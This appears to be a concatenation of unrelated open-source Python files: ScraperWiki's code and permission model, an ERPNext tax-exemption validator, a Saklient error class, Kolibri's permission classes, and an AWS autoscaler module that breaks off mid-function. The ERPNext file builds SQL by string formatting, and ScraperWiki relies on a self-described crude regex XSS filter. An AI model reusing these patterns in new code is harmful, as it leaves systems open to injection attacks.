u = UserProfile.objects.get(apikey=apikey).user
except UserProfile.DoesNotExist:
u = None
if u and not u.is_anonymous():
scrapers_all = scrapers_all.exclude(Q(privacy_status="private") & ~(Q(usercoderole__user=u) & Q(usercoderole__role='owner')) & ~(Q(usercoderole__user=u) & Q(usercoderole__role='editor')))
else:
scrapers_all = scrapers_all.exclude(privacy_status="private")
return scrapers_all
def scraper_search_query(user, query, apikey=None):
scrapers_all = scraper_search_query_unordered(user, query, apikey=None)
scrapers_all = scrapers_all.order_by('-created_at')
return scrapers_all.distinct()
def user_search_query(user, query, apikey=None):
users_name = User.objects.filter(userprofile__name__icontains=query)
users_bio = User.objects.filter(userprofile__bio__icontains=query)
users_username = User.objects.filter(username__icontains=query)
users_all = users_name | users_bio | users_username
users_all.order_by('-created_at')
return users_all.distinct()
class Code(models.Model):
# model fields
title = models.CharField(max_length=100,
null=False,
blank=False,
verbose_name='Scraper Title',
default='Untitled')
short_name = models.CharField(max_length=50, unique=True)
description = models.TextField(blank=True)
created_at = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=10, blank=True, default='ok') # "sick", "ok"
users = models.ManyToManyField(User, through='UserCodeRole')
guid = models.CharField(max_length=1000)
line_count = models.IntegerField(default=0)
featured = models.BooleanField(default=False)
istutorial = models.BooleanField(default=False)
language = models.CharField(max_length=32, choices=LANGUAGES, default='python')
wiki_type = models.CharField(max_length=32, choices=WIKI_TYPES, default='scraper')
relations = models.ManyToManyField("self", blank=True) # manage.py refuses to generate the tabel for this, so you haev to do it manually.
forked_from = models.ForeignKey('self', null=True, blank=True)
privacy_status = models.CharField(max_length=32, choices=PRIVACY_STATUSES, default='public')
previous_privacy = models.CharField(max_length=32, choices=PRIVACY_STATUSES, null=True, blank=True)
has_screen_shot = models.BooleanField( default=False )
# For private scrapers this can be provided to API calls as proof that the caller has access
# to the scraper, it is really a shared secret between us and the caller. For the datastore
# API call it will only be used to verify access to the main DB, not the attached as that is
# done through the existing code permissions model.
# This should be regeneratable on demand by any editor/owner of the scraper (if it is private)
access_apikey = models.CharField(max_length=64, blank=True, null=True)
def __init__(self, *args, **kwargs):
super(Code, self).__init__(*args, **kwargs)
if not self.created_at:
self.created_at = datetime.datetime.today()
def save(self, *args, **kwargs):
# Check type and apikey and generate one if necessary
if self.privacy_status == "private" and not self.access_apikey:
self.generate_apikey()
if not self.short_name:
self._buildfromfirsttitle()
if not self.guid:
self.set_guid()
super(Code, self).save(*args, **kwargs)
def __unicode__(self):
return self.short_name
@property
def vcs(self):
return vc.MercurialInterface(self.get_repo_path())
def commit_code(self, code_text, commit_message, user):
self.vcs.savecode(code_text, "code")
rev = self.vcs.commit(message=commit_message, user=user)
return rev
def set_docs(self, description, user):
self.description = description
self.vcs.savecode(description, "docs")
rev = self.vcs.commit(message="save docs", user=user)
def generate_apikey(self):
import uuid
self.access_apikey = str( uuid.uuid4() )
def get_commit_log(self, filename):
return self.vcs.getcommitlog(filename)
def get_file_status(self):
return self.vcs.getfilestatus("code")
# this is hardcoded to get revision list for "code"
def get_vcs_status(self, revision = None):
return self.vcs.getstatus(revision)
def get_reversion(self, rev):
return self.vcs.getreversion(rev)
def _buildfromfirsttitle(self):
assert not self.short_name
self.short_name = util.SlugifyUniquely(self.title, Code, slugfield='short_name', instance=self)
assert self.short_name != ''
def last_runevent(self):
lscraperrunevents = self.scraper.scraperrunevent_set.all().order_by("-run_started")[:1]
return lscraperrunevents and lscraperrunevents[0] or None
def is_sick_and_not_running(self):
if self.status == 'sick':
return True
return False
def set_guid(self):
self.guid = hashlib.md5("%s" % ("**@@@".join([self.short_name, str(time.mktime(self.created_at.timetuple()))]))).hexdigest()
# it would be handy to get rid of this function
def owner(self):
if self.pk:
owner = self.users.filter(usercoderole__role='owner')
if len(owner) >= 1:
return owner[0]
return None
def editors(self):
if self.pk:
return self.users.filter(usercoderole__role='editor')
return None
def attachable_scraperdatabases(self):
try:
return [ cp.permitted_object for cp in CodePermission.objects.filter(code=self).all() if cp.permitted_object.privacy_status != "deleted" ]
except:
return []
# could filter for the private scrapers which this user is allowed to see!
def attachfrom_scrapers(self):
return [ cp.code for cp in CodePermission.objects.filter(permitted_object=self).all() if cp.permitted_object.privacy_status not in ["deleted", "private"] ]
def add_user_role(self, user, role='owner'):
"""
Method to add a user as either an editor or an owner to a scraper/view.
- `user`: a django.contrib.auth.User object
- `role`: String, either 'owner' or 'editor'
Valid role are:
* "owner"
* "editor"
* "follow"
* "requester"
* "email"
"""
valid_roles = ['owner', 'editor', 'follow', 'requester', 'email']
if role not in valid_roles:
raise ValueError("""
%s is not a valid role. Valid roles are:\n
%s
""" % (role, ", ".join(valid_roles)))
#check if role exists before adding
u, created = UserCodeRole.objects.get_or_create(user=user,
code=self,
role=role)
# should eventually replace add_user_role
# knows what roles are redundant to each other
def set_user_role(self, user, role, remove=False):
assert role in ['owner', 'editor', 'follow'] # for now
userroles = UserCodeRole.objects.filter(code=self, user=user)
euserrole = None
for userrole in userroles:
if userrole.role == role:
if remove:
userrole.delete()
else:
euserrole = userrole
elif userrole.role in ['owner', 'editor', 'follow'] and role in ['owner', 'editor', 'follow']:
userrole.delete()
if not euserrole and not remove:
euserrole = UserCodeRole(code=self, user=user, role=role)
euserrole.save()
return euserrole
# uses lists of users rather than userroles so that you can test containment easily
def userrolemap(self):
result = { "editor":[], "owner":[]}
for usercoderole in self.usercoderole_set.all():
if usercoderole.role not in result:
result[usercoderole.role] = [ ]
result[usercoderole.role].append(usercoderole.user)
return result
def saved_code(self, revision = None):
return self.get_vcs_status(revision)["code"]
def get_repo_path(self):
if settings.SPLITSCRAPERS_DIR:
return os.path.join(settings.SPLITSCRAPERS_DIR, self.short_name)
# XXX this should either raise an error, or return something, in the case
# where SPLITSCRAPERS_DIR isn't set. no idea if there is some real case
# where that happens
def get_absolute_url(self):
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
current_site = Site.objects.get_current()
r = reverse('code_overview', kwargs={'wiki_type':self.wiki_type, 'short_name':self.short_name})
url = 'https://%s%s' % (current_site.domain,r,)
return url
# update scraper meta data (lines of code etc)
def update_meta(self):
pass
# this is just to handle the general pointer put into Alerts
def content_type(self):
return ContentType.objects.get(app_label="codewiki", model="Code")
def get_screenshot_filename(self, size='medium'):
return "%s.png" % self.short_name
def get_screenshot_filepath(self, size='medium'):
filename = self.get_screenshot_filename(size)
return os.path.join(settings.SCREENSHOT_DIR, size, filename)
def screenshot_url(self, size='medium'):
from django.conf import settings
if self.has_screenshot(size):
url = settings.MEDIA_URL + 'screenshots/' + size + '/' + self.get_screenshot_filename(size=size)
else:
url = settings.MEDIA_URL + 'images/testcard_' + size + '.png'
return url
def has_screenshot(self, size='medium'):
has = os.path.exists(self.get_screenshot_filepath(size))
if has and not self.has_screen_shot:
self.has_screen_shot = True
self.save()
return has
class Meta:
app_label = 'codewiki'
# the only remaining reference to textile
def description_ashtml(self):
cdesc = self.description_safepart()
if re.search("__BEGIN", self.description):
envvars = self.description_envvars()
nqsenvvars = len(re.findall("=", envvars.get("QUERY_STRING", "")))
if nqsenvvars:
cdesc = "%s\n\n_Has %d secret query-string environment variable%s._" % (cdesc, nqsenvvars, (nqsenvvars>1 and "s" or ""))
# Doing some very crude XSS protection
cdesc = re.sub("<(\s*script)(?i)", "<\\1", cdesc)
if not re.search("<", cdesc):
text = textile.textile(cdesc) # wikicreole at the very least here!!!
text = text.replace("“", '"')
text = text.replace("”", '"')
text = text.replace("’", "'")
else:
text = cdesc
return text
def description_safepart(self): # used in the api output
cdesc = re.sub('(?s)__BEGIN_QSENVVARS__.*?__END_QSENVVARS__', '', self.description)
cdesc = re.sub('(?s)__BEGIN_ENVVARS__.*?__END_ENVVARS__', '', cdesc)
return cdesc
# You can encode the query string as individual elements, or as one block.
# If controller/node can drop in environment variables directly, then we can consider a general purpose adding of
# such environment variables not through the QUERY_STRING interface which requires decoding in the scraper.
# Would be more traditional to obtain the values as os.getenv("TWITTER_API_KEY") than dict(cgi.parse_qsl(os.getenv("QUERY_STRING")))["TWITTER_API_KEY"]
def description_envvars(self):
qsenvvars = { }
for lines in re.findall('(?s)__BEGIN_QSENVVARS__(.*?)__END_QSENVVARS__', self.description):
for line in lines.split("\n"):
sline = line.strip()
if sline:
psline = sline.partition("=")
qsenvvars[psline[0].strip()] = psline[2].strip()
envvars = { }
if qsenvvars:
envvars["QUERY_STRING"] = urllib.urlencode(qsenvvars)
for lines in re.findall('(?s)__BEGIN_ENVVARS__(.*?)__END_ENVVARS__', self.description):
for line in lines.split("\n"):
sline = line.strip()
if sline:
psline = sline.partition("=")
envvars[psline[0].strip()] = line[2].strip()
return envvars
# all authorization to go through here
def actionauthorized(self, user, action):
if user and not user.is_anonymous():
roles = [ usercoderole.role for usercoderole in UserCodeRole.objects.filter(code=self, user=user) ]
else:
roles = [ ]
#print "Code.actionauthorized AUTH", (action, user, roles, self.privacy_status)
# roles are: "owner", "editor", "follow", "requester", "email"
# privacy_status: "public", "visible", "private", "deleted"
if self.privacy_status == "deleted":
return False
# extra type control condition
if action == "rpcexecute" and self.wiki_type != "view":
return False
if action in STAFF_ACTIONS:
return user.is_staff
if user.is_staff and action in STAFF_EXTRA_ACTIONS:
return True
if action in CREATOR_ACTIONS:
return "owner" in roles
if action in EDITOR_ACTIONS:
if self.privacy_status == "public":
return user.is_authenticated()
return "editor" in roles or "owner" in roles
if action in VISIBLE_ACTIONS:
if self.privacy_status == "private":
return "editor" in roles or "owner" in roles
return True
assert False, ("unknown action", action)
return True
def authorizationfailedmessage(self, user, action):
if self.privacy_status == "deleted":
return {'heading': 'Deleted', 'body': "Sorry this %s has been deleted" % self.wiki_type}
if action == "rpcexecute" and self.wiki_type != "view":
return {'heading': 'This is a scraper', 'body': "Not supposed to run a scraper as a view"}
if action in STAFF_ACTIONS:
return {'heading': 'Not authorized', 'body': "Only staff can do action %s" % action}
if action in CREATOR_ACTIONS:
return {'heading': 'Not authorized', 'body': "Only owner can do action %s" % action}
if action in EDITOR_ACTIONS:
if self.privacy_status != "public":
return {'heading': 'Not authorized', 'body': "This %s can only be edited by its owner and designated editors" % self.wiki_type}
if not user.is_authenticated():
return {'heading': 'Not authorized', 'body': "Only logged in users can edit things"}
if action in VISIBLE_ACTIONS:
if self.privacy_status == "private":
return {'heading': 'Not authorized', 'body': "Sorry, this %s is private" % self.wiki_type}
return {'heading': "unknown", "body":"unknown"}
def api_actionauthorized(self, apikey):
if self.privacy_status == 'private':
return all([ self.access_apikey, apikey, self.access_apikey == apikey ])
return True
# tags have been unhelpfully attached to the scraper and view classes rather than the base code class
# we can minimize the damage caused by this decision (in terms of forcing the scraper/view code to be
# unnecessarily separate by filtering as much of this application as possible through this interface
def gettags(self):
if self.wiki_type == "scraper":
return tagging.models.Tag.objects.get_for_object(self.scraper)
return tagging.models.Tag.objects.get_for_object(self.view)
def settags(self, tag_names):
if self.wiki_type == "scraper":
tagging.models.Tag.objects.update_tags(self.scraper, tag_names)
else:
tagging.models.Tag.objects.update_tags(self.view, tag_names)
# is the automatically made, builtin emailer
def is_emailer(self):
return self.short_name[-8:] == '.emailer'
# I think this is another of those things that could be saved into the mercurial docs field
# (as a query_string itself) so we can use the history and editing permissions all there.
# would considerably simplify the situation
class CodeSetting(models.Model):
"""
A single key=value setting for a scraper/view that is editable for that
view/scraper by the owner (or editor). There will be several (potentially)
of these per scraper/view that are only visible to owners and editors where
the scraper/view is private/protected.
It is passed through the system with the code when executed and so will
be available within the scraper code via an internal api setting - such
as scraperwiki.setting('name')
Records the user who last saved the setting (and when) so that there is
a minimal amount of auditing available.
"""
code = models.ForeignKey(Code, related_name='settings')
key = models.CharField(max_length=100)
value = models.TextField()
last_edited = models.ForeignKey(User)
last_edit_date = models.DateTimeField(auto_now=True)
def __unicode__(self):
return repr(self)
def __repr__(self):
return '<CodeSetting: %s for %s>' % (self.key, self.code.short_name,)
class Meta:
app_label = 'codewiki'
class CodePermission(models.Model):
"""
A uni-directional permission to read/write to a particular scraper/view
for another scraper/view.
"""
code = models.ForeignKey(Code, related_name='permissions')
permitted_object = models.ForeignKey(Code, related_name='permitted') # should call this permitted_code so we don't assume is untyped
def __unicode__(self):
return u'%s CANATTACHTO %s' % (self.code.short_name, self.permitted_object.short_name,)
class Meta:
app_label = 'codewiki'
class UserCodeRole(models.Model):
user = models.ForeignKey(User)
code = models.ForeignKey(Code)
role = models.CharField(max_length=100) # ['owner', 'editor', 'follow', 'requester', 'email']
def __unicode__(self):
return "Scraper_id: %s -> User: %s (%s)" % (self.code, self.user, self.role)
class Meta:
app_label = 'codewiki'
class UserUserRole(models.Model):
pass
| rossjones/ScraperWikiX | web/codewiki/models/code.py | Python | agpl-3.0 | 21,938 |
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe import _
from frappe.utils import date_diff, flt
from erpnext.hr.utils import validate_tax_declaration, calculate_eligible_hra_exemption
class EmployeeTaxExemptionProofSubmission(Document):
def validate(self):
validate_tax_declaration(self.tax_exemption_proofs)
if self.house_rent_payment_amount:
self.validate_house_rent_dates()
self.get_monthly_hra()
self.calculate_hra_exemption()
self.calculate_total_exemption()
def get_monthly_hra(self):
factor = self.get_rented_days_factor()
self.monthly_house_rent = self.house_rent_payment_amount / factor
def validate_house_rent_dates(self):
if date_diff(self.rented_to_date, self.rented_from_date) < 14:
frappe.throw(_("House Rented dates should be atleast 15 days apart"))
proofs = frappe.db.sql("""select name from `tabEmployee Tax Exemption Proof Submission`
where docstatus=1 and employee='{0}' and payroll_period='{1}' and
(rented_from_date between '{2}' and '{3}' or rented_to_date between
'{2}' and '{2}')""".format(self.employee, self.payroll_period,
self.rented_from_date, self.rented_to_date))
if proofs:
frappe.throw(_("House rent paid days overlap with {0}").format(proofs[0][0]))
def calculate_hra_exemption(self):
exemptions = calculate_eligible_hra_exemption(self.company, self.employee, \
self.monthly_house_rent, self.rented_in_metro_city)
self.monthly_hra_exemption = exemptions["monthly_exemption"]
if self.monthly_hra_exemption:
factor = self.get_rented_days_factor(rounded=False)
self.total_eligible_hra_exemption = self.monthly_hra_exemption * factor
else:
self.monthly_hra_exemption, self.total_eligible_hra_exemption = 0, 0
def get_rented_days_factor(self, rounded=True):
factor = flt(date_diff(self.rented_to_date, self.rented_from_date) + 1)/30
factor = round(factor * 2)/2
return factor if factor else 0.5
def calculate_total_exemption(self):
self.total_amount = 0
for proof in self.tax_exemption_proofs:
self.total_amount += proof.amount
if self.monthly_house_rent and self.total_eligible_hra_exemption:
self.total_amount += self.total_eligible_hra_exemption
| manassolanki/erpnext | erpnext/hr/doctype/employee_tax_exemption_proof_submission/employee_tax_exemption_proof_submission.py | Python | gpl-3.0 | 2,380 |
# -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from ...errors.httpbadrequestexception import HttpBadRequestException
import saklient
str = six.text_type
# module saklient.cloud.errors.invalidformatexception
class InvalidFormatException(HttpBadRequestException):
## 不適切な要求です。パラメータに含まれている値のフォーマットが一部不正です。
## @param {int} status
# @param {str} code=None
# @param {str} message=""
def __init__(self, status, code=None, message=""):
super(InvalidFormatException, self).__init__(status, code, "不適切な要求です。パラメータに含まれている値のフォーマットが一部不正です。" if message is None or message == "" else message)
| sakura-internet/saklient.python | saklient/cloud/errors/invalidformatexception.py | Python | mit | 817 |
"""
This module defines the base classes for Kolibri's class-based Permissions system.
"""
from django.db.models import F
####################################################################################################################
# This section contains base classes that can be inherited and extended to define more complex permissions behavior.
####################################################################################################################
class BasePermissions(object):
"""
Base Permission class from which all other Permission classes should inherit.
The following methods should be overridden in child classes:
- The following four Boolean (True/False) permission checks, corresponding to the "CRUD" operations:
- `user_can_create_object`
- `user_can_read_object`
- `user_can_update_object`
- `user_can_delete_object`
- The queryset-filtering `readable_by_user_filter` method, which takes in a queryset and returns a queryset
filtered down to just objects that should be readable by the user.
"""
def user_can_create_object(self, user, obj):
"""Returns True if this permission class grants <user> permission to create the provided <obj>.
Note that the object may not yet have been saved to the database (as this may be a pre-save check)."""
raise NotImplementedError(
"Override `user_can_create_object` in your permission class before you use it."
)
def user_can_read_object(self, user, obj):
"""Returns True if this permission class grants <user> permission to read the provided <obj>."""
raise NotImplementedError(
"Override `user_can_read_object` in your permission class before you use it."
)
def user_can_update_object(self, user, obj):
"""Returns True if this permission class grants <user> permission to update the provided <obj>."""
raise NotImplementedError(
"Override `user_can_update_object` in your permission class before you use it."
)
def user_can_delete_object(self, user, obj):
"""Returns True if this permission class grants <user> permission to delete the provided <obj>."""
raise NotImplementedError(
"Override `user_can_delete_object` in your permission class before you use it."
)
def readable_by_user_filter(self, user, queryset):
"""Applies a filter to the provided queryset, only returning items for which the user has read permission."""
raise NotImplementedError(
"Override `readable_by_user_filter` in your permission class before you use it."
)
def __or__(self, other):
"""
Allow two instances of BasePermission to be joined together with "|", which returns a permissions class
that grants permission for an object when *either* of the instances would grant permission for that object.
"""
return PermissionsFromAny(self, other)
def __and__(self, other):
"""
Allow two instances of BasePermission to be joined together with "&", which returns a permissions class
that grants permission for an object when *both* of the instances grant permission for that object.
"""
return PermissionsFromAll(self, other)
class RoleBasedPermissions(BasePermissions):
"""
Permissions class that defines a requesting user's permissions in terms of his or her kinds of roles with respect
to a User or Collection that is related to the object.
"""
def __init__(
self,
target_field,
can_be_created_by,
can_be_read_by,
can_be_updated_by,
can_be_deleted_by,
):
"""
:param str target_field: the name of the field through which the role target (user or collection) will be referenced
(or "." if the object itself is the target). The referenced field should be a ``ForeignKey`` either to a
``FacilityUser`` or a ``Collection`` model.
:param tuple can_be_created_by: a tuple of role kinds that should give a user permission to create the object
:param tuple can_be_read_by: a tuple of role kinds that should give a user permission to read the object
:param tuple can_be_updated_by: a tuple of role kinds that should give a user permission to update the object
:param tuple can_be_deleted_by: a tuple of role kinds that should give a user permission to delete the object
"""
self.can_be_created_by = can_be_created_by
self.can_be_read_by = can_be_read_by
self.can_be_updated_by = can_be_updated_by
self.can_be_deleted_by = can_be_deleted_by
self.target_field = target_field
def _get_target_object(self, obj):
if self.target_field == ".": # this means the object itself is the target
return obj
else: # otherwise, do the lookup based on the provided field name, and fetch the target object
# TODO(jamalex): allow related object lookups (e.g. "classroom__parent"), rather than just direct FK's
return getattr(obj, self.target_field)
def user_can_create_object(self, user, obj):
roles = getattr(self, "can_be_created_by", None)
assert isinstance(
roles, tuple
), "If `can_be_created_by` is None, then `user_can_create_object` method must be overridden with custom behavior."
target_object = self._get_target_object(obj)
return user.has_role_for(roles, target_object)
def user_can_read_object(self, user, obj):
roles = getattr(self, "can_be_read_by", None)
assert isinstance(
roles, tuple
), "If `can_be_read_by` is None, then `user_can_read_object` method must be overridden with custom behavior."
target_object = self._get_target_object(obj)
return user.has_role_for(roles, target_object)
def user_can_update_object(self, user, obj):
roles = getattr(self, "can_be_updated_by", None)
assert isinstance(
roles, tuple
), "If `can_be_updated_by` is None, then `user_can_update_object` method must be overridden with custom behavior."
target_object = self._get_target_object(obj)
return user.has_role_for(roles, target_object)
def user_can_delete_object(self, user, obj):
roles = getattr(self, "can_be_deleted_by", None)
assert isinstance(
roles, tuple
), "If `can_be_deleted_by` is None, then `user_can_delete_object` method must be overridden with custom behavior."
target_object = self._get_target_object(obj)
return user.has_role_for(roles, target_object)
def readable_by_user_filter(self, user, queryset):
# import here to prevent circular dependencies
from ..models import Collection
from ..filters import HierarchyRelationsFilter
if user.is_anonymous():
return queryset.none()
query = {"source_user": user, "role_kind": self.can_be_read_by}
if self.target_field == ".":
if issubclass(queryset.model, Collection):
query["descendant_collection"] = F("id")
else:
query["target_user"] = F("id")
else:
related_model = queryset.model._meta.get_field(
self.target_field
).remote_field.model
if issubclass(related_model, Collection):
query["descendant_collection"] = F(self.target_field)
else:
query["target_user"] = F(self.target_field)
return HierarchyRelationsFilter(queryset).filter_by_hierarchy(**query)
####################################################################################################################
# This section contains Boolean permissions classes that allow multiple permissions classes to be joined together.
####################################################################################################################
class PermissionsFromAny(BasePermissions):
"""
Serves as an "OR" operator for Permission classes; pass in a number of Permission classes,
and the permission-checking methods on the PermissionsFromAny instance will return True if
any of the Permission classes passed in (the "children" permissions) return True.
"""
def __init__(self, *perms):
self.perms = []
for perm in perms:
# ensure that perm is an instance of a subclass of BasePermissions
assert isinstance(
perm, BasePermissions
), "each of the arguments to __init__ must be a subclass (or instance of a subclass) of BasePermissions"
# add it into the children permissions list
self.perms.append(perm)
def _permissions_from_any(self, user, obj, method_name):
"""
Private helper method to do the corresponding method calls on children permissions instances,
and succeed as soon as one of them succeeds, or fail if none of them do.
"""
for perm in self.perms:
if getattr(perm, method_name)(user, obj):
return True
return False
def user_can_create_object(self, user, obj):
return self._permissions_from_any(user, obj, "user_can_create_object")
def user_can_read_object(self, user, obj):
return self._permissions_from_any(user, obj, "user_can_read_object")
def user_can_update_object(self, user, obj):
return self._permissions_from_any(user, obj, "user_can_update_object")
def user_can_delete_object(self, user, obj):
return self._permissions_from_any(user, obj, "user_can_delete_object")
def readable_by_user_filter(self, user, queryset):
# call each of the children permissions instances in turn, performing an "OR" on the querysets
union_queryset = queryset.none()
for perm in self.perms:
union_queryset = union_queryset | perm.readable_by_user_filter(
user, queryset
)
return union_queryset
class PermissionsFromAll(BasePermissions):
"""
Serves as an "AND" operator for Permission classes; pass in a number of Permission classes,
and the permission-checking methods on the PermissionsFromAll instance will return True only if
all of the Permission classes passed in (the "children" permissions) return True.
"""
def __init__(self, *perms):
self.perms = []
for perm in perms:
# ensure that perm is an instance of a subclass of BasePermissions
assert isinstance(
perm, BasePermissions
), "each of the arguments to __init__ must be a subclass (or instance of a subclass) of BasePermissions"
# add it into the children permissions list
self.perms.append(perm)
def _permissions_from_all(self, user, obj, method_name):
"""
Private helper method to do the corresponding method calls on children permissions instances,
and fail as soon as one of them fails, or succeed if all of them succeed.
"""
for perm in self.perms:
if not getattr(perm, method_name)(user, obj):
return False
return True
def user_can_create_object(self, user, obj):
return self._permissions_from_all(user, obj, "user_can_create_object")
def user_can_read_object(self, user, obj):
return self._permissions_from_all(user, obj, "user_can_read_object")
def user_can_update_object(self, user, obj):
return self._permissions_from_all(user, obj, "user_can_update_object")
def user_can_delete_object(self, user, obj):
return self._permissions_from_all(user, obj, "user_can_delete_object")
def readable_by_user_filter(self, user, queryset):
# call each of the children permissions instances in turn, iteratively filtering down the queryset
for perm in self.perms:
queryset = perm.readable_by_user_filter(user, queryset)
return queryset
# helper functions
def lookup_field_with_fks(field_ref, obj):
for key in field_ref.split("__"):
obj = getattr(obj, key)
return obj
| lyw07/kolibri | kolibri/core/auth/permissions/base.py | Python | mit | 12,304 |
import datetime
import logging
import re
from concurrent.futures import ThreadPoolExecutor
import botocore
import pytz
import autoscaler.aws_utils as aws_utils
import autoscaler.utils as utils
logger = logging.getLogger(__name__)
class AutoScalingGroups(object):
_BOTO_CLIENT_TYPE = 'autoscaling'
_CLUSTER_KEY = 'KubernetesCluster'
_ROLE_KEYS = ('KubernetesRole', 'Role')
_WORKER_ROLE_VALUES = ('worker', 'kubernetes-minion')
def __init__(self, session, regions, cluster_name=None):
"""
cluster_name - if set, filter ASGs by cluster_name in tag field
_CLUSTER_KEY
"""
self.session = session
self.regions = regions
self.cluster_name = cluster_name
@staticmethod
def get_all_raw_groups_and_launch_configs(client):
raw_groups = aws_utils.fetch_all(
client.describe_auto_scaling_groups, {'MaxRecords': 100}, 'AutoScalingGroups')
all_launch_configs = {}
batch_size = 50
for launch_config_idx in range(0, len(raw_groups), batch_size):
groups = raw_groups[launch_config_idx*batch_size:(launch_config_idx+1)*batch_size]
kwargs = {
'LaunchConfigurationNames': [g['LaunchConfigurationName'] for g in groups]
}
launch_configs = aws_utils.fetch_all(
client.describe_launch_configurations,
kwargs, 'LaunchConfigurations')
all_launch_configs.update((lc['LaunchConfigurationName'], lc)
for lc in launch_configs)
return raw_groups, all_launch_configs
def get_all_groups(self, kube_nodes):
groups = []
with ThreadPoolExecutor(max_workers=max(1, len(self.regions))) as executor:
raw_groups_and_launch_configs = {}
for region in self.regions:
client = self.session.client(self._BOTO_CLIENT_TYPE,
region_name=region)
raw_groups_and_launch_configs[region] = executor.submit(
AutoScalingGroups.get_all_raw_groups_and_launch_configs, client)
for region in self.regions:
raw_groups, launch_configs = raw_groups_and_launch_configs[region].result()
client = self.session.client(self._BOTO_CLIENT_TYPE,
region_name=region)
for raw_group in sorted(raw_groups, key=lambda g: g['AutoScalingGroupName']):
if self.cluster_name:
cluster_name = None
role = None
for tag in raw_group['Tags']:
if tag['Key'] == self._CLUSTER_KEY:
cluster_name = tag['Value']
elif tag['Key'] in self._ROLE_KEYS:
role = tag['Value']
if cluster_name != self.cluster_name or role not in self._WORKER_ROLE_VALUES:
continue
groups.append(AutoScalingGroup(
client, region, kube_nodes, raw_group,
launch_configs[raw_group['LaunchConfigurationName']]))
return groups
class AutoScalingTimeouts(object):
_TIMEOUT = 3600 # 1 hour
_SPOT_REQUEST_TIMEOUT = 300 # 5 minutes
_MAX_OUTBIDS_IN_INTERVAL = 60*20 # 20 minutes
_SPOT_HISTORY_PERIOD = 60*60*5 # 5 hours
def __init__(self, session):
"""
"""
self.session = session
# ASGs to avoid because of recent launch failures
# e.g. a region running out of capacity
# try to favor other regions
self._timeouts = {}
self._last_activities = {}
# ASGs to avoid because of spot pricing history
self._spot_timeouts = {}
self._spot_price_history = {}
def refresh_timeouts(self, asgs, dry_run=False):
"""
refresh timeouts on ASGs using new data from aws
"""
self.time_out_spot_asgs(asgs)
asgs_by_region = {}
for asg in asgs:
asgs_by_region.setdefault(asg.region, []).append(asg)
for region, regional_asgs in asgs_by_region.items():
client = self.session.client('autoscaling', region_name=region)
start_time_cutoff = None
newest_completed_activity = None
activities = {}
for activity in self.iter_activities(client):
if newest_completed_activity is None and activity['Progress'] == 100:
newest_completed_activity = activity
if activity['ActivityId'] == self._last_activities.get(region, None):
break
if start_time_cutoff is None:
start_time_cutoff = (
datetime.datetime.now(activity['StartTime'].tzinfo) -
datetime.timedelta(seconds=self._TIMEOUT))
if activity['StartTime'] < start_time_cutoff:
# skip events that are too old to cut down the time
# it takes the first time to go through events
break
activities.setdefault(activity['AutoScalingGroupName'], []).append(activity)
self._last_activities[region] = newest_completed_activity['ActivityId']
for asg in regional_asgs:
self.reconcile_limits(asg, activities.get(asg.name, []), dry_run=dry_run)
def iter_activities(self, client):
next_token = None
while True:
kwargs = {}
if next_token:
kwargs['NextToken'] = next_token
data = client.describe_scaling_activities(**kwargs)
for item in data['Activities']:
yield item
next_token = data.get('NextToken')
if not next_token:
break
def revert_capacity(self, asg, entry, dry_run):
"""
try to decrease desired capacity to the original
capacity before the capacity increase that caused
the ASG activity entry.
"""
cause_m = AutoScalingCauseMessages.LAUNCH_INSTANCE.search(entry.get('Cause', ''))
if cause_m:
original_capacity = int(cause_m.group('original_capacity'))
if asg.desired_capacity > original_capacity:
# we tried to go over capacity and failed
# now set the desired capacity back to a normal range
if not dry_run:
asg.set_desired_capacity(original_capacity)
else:
logger.info('[Dry run] Would have set desired capacity to %s', original_capacity)
return True
return False
def time_out_asg(self, asg, entry):
self._timeouts[asg._id] = (
entry['StartTime'] + datetime.timedelta(seconds=self._TIMEOUT))
logger.info('%s is timed out until %s',
asg.name, self._timeouts[asg._id])
def reconcile_limits(self, asg, activities, dry_run=False):
"""
makes sure the ASG has valid capacity by processing errors
in its recent scaling activities.
marks an ASG as timed out if it recently had a capacity
failure.
"""
for entry in activities:
status_msg = entry.get('StatusMessage', '')
if entry['StatusCode'] in ('Failed', 'Cancelled'):
logger.warn('%s scaling failure: %s', asg, entry)
m = AutoScalingErrorMessages.INSTANCE_LIMIT.match(status_msg)
if m:
max_desired_capacity = int(m.group('requested')) - 1
if asg.desired_capacity > max_desired_capacity:
self.time_out_asg(asg, entry)
# we tried to go over capacity and failed
# now set the desired capacity back to a normal range
if not dry_run:
asg.set_desired_capacity(max_desired_capacity)
else:
logger.info('[Dry run] Would have set desired capacity to %s', max_desired_capacity)
return
m = AutoScalingErrorMessages.VOLUME_LIMIT.match(status_msg)
if m:
# TODO: decrease desired capacity
self.time_out_asg(asg, entry)
return
m = AutoScalingErrorMessages.CAPACITY_LIMIT.match(status_msg)
if m:
reverted = self.revert_capacity(asg, entry, dry_run)
if reverted:
self.time_out_asg(asg, entry)
return
m = AutoScalingErrorMessages.AZ_LIMIT.search(status_msg)
if m and 'only-az' in asg.name:
reverted = self.revert_capacity(asg, entry, dry_run)
if reverted:
self.time_out_asg(asg, entry)
return
m = AutoScalingErrorMessages.SPOT_REQUEST_CANCELLED.search(status_msg)
if m:
# we cancelled a spot request
# don't carry on to reset timeout
continue
m = AutoScalingErrorMessages.SPOT_LIMIT.match(status_msg)
if m:
self.time_out_asg(asg, entry)
if not dry_run:
asg.set_desired_capacity(asg.actual_capacity)
else:
logger.info('[Dry run] Would have set desired capacity to %s', asg.actual_capacity)
return
elif entry['StatusCode'] == 'WaitingForSpotInstanceId':
logger.warn('%s waiting for spot: %s', asg, entry)
balance_cause_m = AutoScalingCauseMessages.AZ_BALANCE.search(entry.get('Cause', ''))
if balance_cause_m:
# sometimes ASGs will launch instances in other az's to
# balance out the group
# ignore these events
# even if we cancel it, the ASG will just attempt to
# launch again
logger.info('ignoring AZ balance launch event')
continue
now = datetime.datetime.now(entry['StartTime'].tzinfo)
if (now - entry['StartTime']) > datetime.timedelta(seconds=self._SPOT_REQUEST_TIMEOUT):
self.time_out_asg(asg, entry)
# try to cancel spot request and scale down ASG
spot_request_m = AutoScalingErrorMessages.SPOT_REQUEST_WAITING.search(status_msg)
if spot_request_m:
